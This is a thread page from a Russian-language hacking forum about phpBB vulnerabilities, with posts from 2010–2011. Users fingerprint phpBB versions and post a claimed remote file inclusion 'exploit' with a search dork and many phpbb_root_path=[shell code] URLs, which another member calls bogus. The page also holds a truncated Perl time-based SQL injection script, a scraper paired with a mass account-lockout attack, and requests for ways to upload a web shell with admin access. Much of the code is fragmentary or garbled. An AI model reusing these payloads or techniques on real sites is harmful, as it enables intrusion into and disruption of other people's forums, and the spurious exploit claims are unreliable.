HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 24.12.2010, 18:57
juffin
Guest
Сообщений: n/a
Провел на форуме:
668

Репутация: 0
По умолчанию

Цитата:
Сообщение от marD  
marD said:
так же версию продукта можно определить
forum/styles/prosilver/style.cfg
интересно.

Да действительно работает даже на версии 3.0.8

м.б. есть еще что то что можно проверить?

выдает:

Код HTML:
HTML:
#
# phpBB Style Configuration File
#
# @package phpBB3
# @copyright (c) 2005 phpBB Group
# @license http://opensource.org/licenses/gpl-license.php GNU Public License
#
#
# At the left is the name, please do not change this
# At the right the value is entered
# For on/off options the valid values are on, off, 1, 0, true and false
#
# Values get trimmed, if you want to add a space in front or at the end of
# the value, then enclose the value with single or double quotes.
# Single and double quotes do not need to be escaped.
#
#

# General Information about this style
name = prosilver
copyright = © phpBB Group, 2007
version = 3.0.8
не удасться ли это использовать как уязвимость?

более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden

You don't have permission to access /styles/ on this server. "

не появиось ли чего новенького для 3.0.8 ?
 
Ответить с цитированием

  #52  
Старый 02.01.2011, 21:01
Catch_t
Guest
Сообщений: n/a
Провел на форуме:
944

Репутация: 0
По умолчанию

Цитата:
Сообщение от juffin  
juffin said:
м.б. есть еще что то что можно проверить?
Можно проверять по второму, идущему в стандарте, стилю: forum/styles/subsilver2/style.cfg

Однако оба этих файла не могут дать твёрдой уверенности, т.к. не всегда обновляются админами при смене версии движка.

Определить версию 3.0.8 можно по косвенным признакам:

1) Наличие файла forum/web.config (*nix отдаст как текст)

2) Ошибка 403 при запросе файлов из папки forum/includes/ (например, forum/includes/functions.php), в более старых версиях открывается чистая страница (ибо exit).

Цитата:
Сообщение от juffin  
juffin said:
не удасться ли это использовать как уязвимость?
Это не уязвимость.

Цитата:
Сообщение от juffin  
juffin said:
более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden
You don't have permission to access /styles/ on this server. "
не появиось ли чего новенького для 3.0.8 ?
Это самодеятельность админов, в стандартной поставке файлы из папки forum/styles/ не защищены ничем
 
Ответить с цитированием

  #53  
Старый 16.01.2011, 02:55
juffin
Guest
Сообщений: n/a
Провел на форуме:
668

Репутация: 0
По умолчанию

интересно. версия точно 3.0.8 все описанные выше косвенные признаки присутствуют,includes/ закрыты видимо .htaccess -ом и т.п.

довольно интересно, нет ли каких либо советов? какие то недо конца или плохо закрытые ветки ? м.б. инъекции уже появились?
 
Ответить с цитированием

  #54  
Старый 18.01.2011, 10:03
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
По умолчанию

phpBB 3.0.7

Код:
Code:
######################################################################
#
# PHPBB Version 3.0.7 Remote File Include !
#
# Author : D.0.M TEAM
#
# Founded By : S3Ri0uS !
#
# We Are : Inj3ct0r.com Exploit and Vulnerability Database.
#
# Public Site : WwW.Anti-Secure.CoM !
#
# Security Site : WwW.D0M-Security.CoM !
#
# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !
#
# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !
#
# SpT : All Iranian Hackers !
#
######################################################################
#
# Dork :
#
# inurl:"powered by PHPBB Version 3.0.7"
#
# Exploit :
#
# http://www.site.com/path/common.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/cron.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/faq.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/feed.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/mcp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/memberlist.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/posting.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/report.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/search.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/style.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/ucp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/viewforum.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/swatch.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/download/file.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/auth.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/functions.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/functions_content.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/session.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/template.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/acm/acm_file.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/acp/acp_attachments.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/utf/utf_tools.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/ucp_register.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/ucp_pm_viewmessage.php?phpbb_root_path=[shell code]
#
######################################################################
 
Ответить с цитированием

  #55  
Старый 29.01.2011, 19:59
Catch_t
Guest
Сообщений: n/a
Провел на форуме:
944

Репутация: 0
По умолчанию

SSSetuPPP, это же бред.

Файл common.php закрыт через .htaccess, во всех файлах из папки /includes/ при прямом запросе срабатывает exit, да и переопределние переменной phpbb_root_path ничего не сможет дать. Хотя указанный выше "эксплоит" ничего и не способен переопределить.
 
Ответить с цитированием

  #56  
Старый 31.01.2011, 09:09
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
По умолчанию

phpBB Version 3.0.7 Remote File Include Vulnerability

_http://www.inj3ct0r.com/exploits/12604

_http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/
 
Ответить с цитированием

  #57  
Старый 08.02.2011, 21:25
SlasH_
Guest
Сообщений: n/a
Провел на форуме:
313

Репутация: 0
По умолчанию

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

[CODE]
Code:
#!/usr/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 > 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash
 
Ответить с цитированием

  #58  
Старый 13.02.2011, 19:12
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Уязвимость в phpbb 2.0.19

Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.

Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

Эксплоит (написан на php)

Собирает в файл Ники всех пользователей форума.


Код:
Code:
Профиль пользователя (.*)/i",$str,$return))
{if(trim($return[1])!=**)
{fputs($file,"$return[1]\n");
}}}}
fclose($file);
fclose($sock);
?>
Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:

1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)

2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)/i",$str,$return))

в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле Юзер - Lamer

то переписываем preg_match как

preg_match("/Юзер - (.*)/i",$str,$return))

Сам сплоит

Код:
Code:
Защита​


Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума.
 
Ответить с цитированием

  #59  
Старый 11.12.2011, 11:44
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Есть какие нибудь способы заливки шелла в 3.0.9 ?

Админ аккаунт имеется..
 
Ответить с цитированием

  #60  
Старый 13.12.2011, 01:06
cylaaaan
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
Провел на форуме:
1763379

Репутация: 155
Отправить сообщение для cylaaaan с помощью ICQ
По умолчанию

А в 3.0.8 есть возможность залить? Админка есть
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости. Обсуждения. 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ